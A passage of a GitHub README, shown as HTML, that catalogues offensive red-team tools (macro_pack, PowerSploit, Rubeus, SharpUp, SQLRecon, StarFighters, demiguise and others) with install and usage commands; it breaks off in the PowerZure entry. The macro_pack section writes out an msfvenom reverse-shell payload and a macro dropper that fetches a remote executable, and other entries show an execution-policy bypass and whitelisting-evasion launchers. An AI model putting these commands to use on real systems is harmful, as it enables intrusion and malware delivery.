class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Creating shellcode from an XSL file that pops up a calculator. shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl") # Creating shellcode from an unmanaged DLL. Invokes DLLMain. shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")"><pre><span class="pl-c"><span class="pl-c">#</span> Creating shellcode from an XSL file that pops up a calculator.</span> shellcode = donut.create(file=r<span class="pl-s"><span class="pl-pds">"</span>C:<span class="pl-cce">\\</span>Tools<span class="pl-cce">\\</span>Source<span class="pl-cce">\\</span>Repos<span class="pl-cce">\\</span>donut<span class="pl-cce">\\</span>calc.xsl<span class="pl-pds">"</span></span>) <span class="pl-c"><span class="pl-c">#</span> Creating shellcode from an unmanaged DLL. 
Invokes DLLMain.</span> shellcode = donut.create(file=r<span class="pl-s"><span class="pl-pds">"</span>C:\Tools\Source\Repos\donut\payload\test\hello.dll<span class="pl-pds">"</span></span>)</pre></div> <p dir="auto">For full usage information, see the donut <a href="https://github.com/TheWover/donut/#4-usage">GitHub Page</a>.</p> <p dir="auto">See <a href="https://thewover.github.io/Bear-Claw/" rel="nofollow">a recent blog post</a> from The Wover for more info.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png"><img src="https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/sevagas/macro_pack">Macro_pack</a></h3><a id="user-content-macro_pack" class="anchor" aria-label="Permalink: 🔙Macro_pack" href="#macro_pack"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <ol dir="auto"> <li>Get the 
latest binary from <a href="https://github.com/sevagas/macro_pack/releases/">https://github.com/sevagas/macro_pack/releases/</a></li> <li>Download binary on PC with genuine Microsoft Office installed.</li> <li>Open console, CD to binary dir and call the binary</li> </ol> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/sevagas/macro_pack.git cd macro_pack pip3 install -r requirements.txt"><pre>git clone https://github.com/sevagas/macro_pack.git <span class="pl-c1">cd</span> macro_pack pip3 install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Help Page python3 macro_pack.py --help # List all supported file formats macro_pack.exe --listformats # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file. 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba # Obfuscate Empire stager VBA file and generate a MS Word document: macro_pack.exe -f empire.vba -o -G myDoc.docm # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" # Execute calc.exe via Dynamic Data Exchange (DDE) attack echo calc.exe | macro_pack.exe --dde -G calc.xlsx"><pre><span class="pl-c"><span class="pl-c">#</span> Help Page</span> python3 macro_pack.py --help <span class="pl-c"><span class="pl-c">#</span> List all supported file formats</span> macro_pack.exe --listformats <span class="pl-c"><span class="pl-c">#</span> Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.</span> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba <span class="pl-k">|</span> macro_pack.exe -o -G meterobf.vba <span class="pl-c"><span class="pl-c">#</span> Obfuscate Empire stager VBA file and generate a MS Word document:</span> macro_pack.exe -f empire.vba -o -G myDoc.docm <span class="pl-c"><span class="pl-c">#</span> Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)</span> <span class="pl-c1">echo</span> <span class="pl-s"><span class="pl-pds">"</span>https://myurl.url/payload.exe<span class="pl-pds">"</span></span> <span class="pl-s"><span class="pl-pds">"</span>dropped.exe<span class="pl-pds">"</span></span> <span class="pl-k">|</span> macro_pack.exe -o -t DROPPER -G <span class="pl-s"><span class="pl-pds">"</span>drop.xlsm<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Execute calc.exe via Dynamic Data Exchange (DDE) attack</span> <span class="pl-c1">echo</span> calc.exe <span class="pl-k">|</span> macro_pack.exe --dde -G calc.xlsx</pre></div> <p dir="auto"><a target="_blank"
rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png"><img src="https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PowerShellMafia/PowerSploit">PowerSploit</a></h3><a id="user-content-powersploit" class="anchor" aria-label="Permalink: 🔙PowerSploit" href="#powersploit"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.</p> <p dir="auto">Some of the features of PowerSploit:</p> <ul dir="auto"> <li>Dump password hashes and extract clear-text passwords from memory</li> <li>Escalate privileges and bypass security controls</li> <li>Execute arbitrary PowerShell code and bypass execution restrictions</li> <li>Perform network reconnaissance and discovery</li> <li>Generate payloads and execute exploits</li> </ul> <p dir="auto"><strong>Note:</strong> <em>The upstream repository states that PowerSploit is no longer supported. Its modules are widely signatured by AV/EDR and AMSI, so on a live engagement treat it as a reference for techniques (and a source of modules to adapt) rather than a drop-in toolkit.</em></p> <p dir="auto"><strong>Install:</strong> <em>1.
Save to PowerShell modules folder</em></p> <p dir="auto">First you will need to download the <a href="https://github.com/PowerShellMafia/PowerSploit">PowerSploit Folder</a> and save it to your PowerShell modules folder.</p> <p dir="auto">Your PowerShell modules folder path can be found with the following command:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$Env:PSModulePath"><pre class="notranslate"><code>$Env:PSModulePath </code></pre></div> <p dir="auto"><strong>Install:</strong> <em>2. Install PowerSploit as a PowerShell module</em></p> <p dir="auto">You will then need to install the PowerSploit module (use the name of the downloaded folder).</p> <p dir="auto"><strong>Note:</strong> <em>Your PowerShell execution policy might block you, to fix this run the following command.</em></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="powershell.exe -ep bypass"><pre class="notranslate"><code>powershell.exe -ep bypass </code></pre></div> <p dir="auto">Now you can install the PowerSploit module.</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Import-Module PowerSploit"><pre class="notranslate"><code>Import-Module PowerSploit </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Get-Command -Module PowerSploit"><pre class="notranslate"><code>Get-Command -Module PowerSploit </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png"><img src="https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png" alt="image" style="max-width: 
100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Rubeus">Rubeus</a></h3><a id="user-content-rubeus" class="anchor" aria-label="Permalink: 🔙Rubeus" href="#rubeus"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# toolset for raw Kerberos interaction and abuse in Microsoft Active Directory (AD) environments. It works at the Kerberos protocol level: requesting and renewing tickets, extracting tickets from the current host and injecting them into a logon session, and performing the Kerberos-specific credential attacks listed below. It does not manage user accounts (creating, deleting or editing users is outside its scope).</p> <p dir="auto">Some of the features of Rubeus:</p> <ul dir="auto"> <li>Kerberoasting</li> <li>AS-REP roasting</li> <li>Pass-the-ticket and overpass-the-hash</li> <li>Golden ticket attacks</li> <li>Silver ticket attacks</li> </ul> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can download an unofficial pre-compiled Rubeus binary <a href="https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe">here</a>. These binaries are built by a third party, not the GhostPack maintainers; when provenance matters, compile from source and compare hashes.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Rubeus is compatible with <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>.
Open the rubeus <a href="https://github.com/GhostPack/Rubeus">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Rubeus.exe -h"><pre class="notranslate"><code>Rubeus.exe -h </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png"><img src="https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/SharpUp">SharpUp</a></h3><a id="user-content-sharpup" class="anchor" aria-label="Permalink: 🔙SharpUp" href="#sharpup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# port of PowerUp's privilege-escalation checks. It audits a victim's endpoint for local privilege-escalation vulnerabilities and misconfigurations: modifiable services and service binaries, unquoted service paths, hijackable <code>%PATH%</code> entries, and checks that depend on the current integrity level or group membership.</p> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can download the unofficial pre-compiled SharpUp binary <a
href="https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe">here</a>.</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">SharpUp is compatible with <a href="https://go.microsoft.com/fwlink/?LinkId=532606&clcid=0x409" rel="nofollow">Visual Studio 2015 Community Edition</a>. Open the SharpUp <a href="https://github.com/GhostPack/SharpUp">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership. SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable. SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership."><pre>SharpUp.exe audit <span class="pl-c"><span class="pl-c">#</span>-> Runs all vulnerability checks regardless of integrity level or group membership.</span> SharpUp.exe HijackablePaths <span class="pl-c"><span class="pl-c">#</span>-> Check only if there are modifiable paths in the user's %PATH% variable.</span> SharpUp.exe audit HijackablePaths <span class="pl-c"><span class="pl-c">#</span>-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png"><img src="https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a 
href="https://github.com/skahwah/SQLRecon">SQLRecon</a></h3><a id="user-content-sqlrecon" class="anchor" aria-label="Permalink: 🔙SQLRecon" href="#sqlrecon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">MS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.</p> <p dir="auto">This C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. 
For detailed usage information on each technique, refer to the <a href="https://github.com/skahwah/SQLRecon/wiki">wiki</a>.</p> <p dir="auto"><strong>Install: (Binary)</strong></p> <p dir="auto">You can download the latest binary release from <a href="https://github.com/skahwah/SQLRecon/releases">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Authenticating using Windows credentials SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # Authenticating using Local credentials SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami # Authenticating using Azure AD credentials SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami # Run whoami SQLRecon.exe -a Windows -s SQL01 -d master -m whoami # View databases SQLRecon.exe -a Windows -s SQL01 -d master -m databases # View tables SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019"><pre><span class="pl-c"><span class="pl-c">#</span> Authenticating using Windows credentials</span> SQLRecon.exe -a Windows -s SQL01 -d master -m whoami <span class="pl-c"><span class="pl-c">#</span> Authenticating using Local credentials</span> SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami <span class="pl-c"><span class="pl-c">#</span> Authenticating using Azure AD credentials</span> SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami <span class="pl-c"><span class="pl-c">#</span> Run whoami</span> SQLRecon.exe -a Windows -s SQL01 -d master -m whoami <span class="pl-c"><span class="pl-c">#</span> View databases</span> SQLRecon.exe -a Windows -s SQL01 -d master -m databases <span class="pl-c"><span class="pl-c">#</span> View tables</span> SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019</pre></div> <p 
dir="auto">Full usage information can be found on the <a href="https://github.com/skahwah/SQLRecon/wiki">wiki</a>.</p> <p dir="auto">Tool module usage information can be found <a href="https://github.com/skahwah/SQLRecon#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png"><img src="https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from SQLRecon help page</em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/api0cradle/UltimateAppLockerByPassList">UltimateAppLockerByPassList</a></h3><a id="user-content-ultimateapplockerbypasslist" class="anchor" aria-label="Permalink: 🔙UltimateAppLockerByPassList" href="#ultimateapplockerbypasslist"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This resource is a collection of the most common and well-known techniques to bypass AppLocker.</p> <p dir="auto">Since AppLocker can be configured in different ways, <a href="https://github.com/api0cradle">@api0cradle</a> maintains a verified list of bypasses (that work against the default AppLocker 
rules) and a list of possible bypass techniques (depending on configuration) or techniques that someone has claimed to be a bypass.</p> <p dir="auto">They also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.</p> <p dir="auto">Indexed Lists</p> <ul dir="auto"> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md">Generic-AppLockerbypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md">VerifiedAppLockerBypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md">UnverifiedAppLockerBypasses.md</a></li> <li><a href="https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md">DLL-Execution.md</a></li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png"><img src="https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/api0cradle/UltimateAppLockerByPassList">https://github.com/api0cradle/UltimateAppLockerByPassList</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Cn33liz/StarFighters">StarFighters</a></h3><a id="user-content-starfighters" class="anchor" aria-label="Permalink: 🔙StarFighters" href="#starfighters"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 
0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A JavaScript and VBScript Based Empire Launcher, which run within their own embedded PowerShell Host.</p> <p dir="auto">Both Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe.</p> <p dir="auto">This might be useful when a company is blocking PowerShell.exe and/or is using an application whitelisting solution, but does not block running JS/VBS files.</p> <p dir="auto"><strong>Usage:</strong></p> <ul dir="auto"> <li>Set up a new Listener within PowerShell Empire</li> <li>Use the Launcher command to Generate a PowerShell launcher for this listener</li> <li>Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file</li> </ul> <p dir="auto">For the JavaScript version use the following Variable:</p> <div class="highlight highlight-source-js notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" var EncodedPayload = "<Paste Encoded Launcher Payload Here>""><pre> <span class="pl-k">var</span> <span class="pl-v">EncodedPayload</span> <span class="pl-c1">=</span> <span class="pl-s">"<Paste Encoded Launcher Payload Here>"</span></pre></div> <p dir="auto">For the VBScript version use the following Variable:</p> <div class="highlight highlight-source-vbnet notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>""><pre> <span class="pl-k">Dim</span> <span class="pl-smi">EncodedPayload:</span> <span class="pl-smi">EncodedPayload</span> <span class="pl-smi">=</span> <span 
class="pl-s">"<Paste Encoded Launcher Payload Here>"</span></pre></div> <ul dir="auto"> <li>Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.</li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png"><img src="https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html" rel="nofollow">https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/nccgroup/demiguise">demiguise</a></h3><a id="user-content-demiguise" class="anchor" aria-label="Permalink: 🔙demiguise" href="#demiguise"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The aim of this project is to generate .html files that contain an encrypted HTA file.</p> <p dir="auto">The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and 
pushed directly to the user.</p> <p dir="auto">This is an evasion technique to get round content / file-type inspection implemented by some security-appliances.</p> <p dir="auto">Further technical information <a href="https://github.com/nccgroup/demiguise#how-does-it-do-it">here</a>.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/nccgroup/demiguise cd demiguise"><pre class="notranslate"><code>git clone https://github.com/nccgroup/demiguise cd demiguise </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate an encrypted .hta file that executes notepad.exe python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta"><pre><span class="pl-c"><span class="pl-c">#</span> Generate an encrypted .hta file that executes notepad.exe</span> python demiguise.py -k hello -c <span class="pl-s"><span class="pl-pds">"</span>notepad.exe<span class="pl-pds">"</span></span> -p Outlook.Application -o test.hta</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png"><img src="https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/nccgroup/demiguise">https://github.com/nccgroup/demiguise</a></em></p> <div class="markdown-heading" dir="auto"><h2 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/hausec/PowerZure">PowerZure</a></h2><a id="user-content-powerzure" class="anchor" aria-label="Permalink: 🔙PowerZure" href="#powerzure"><svg 
class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.</p> <p dir="auto">There is 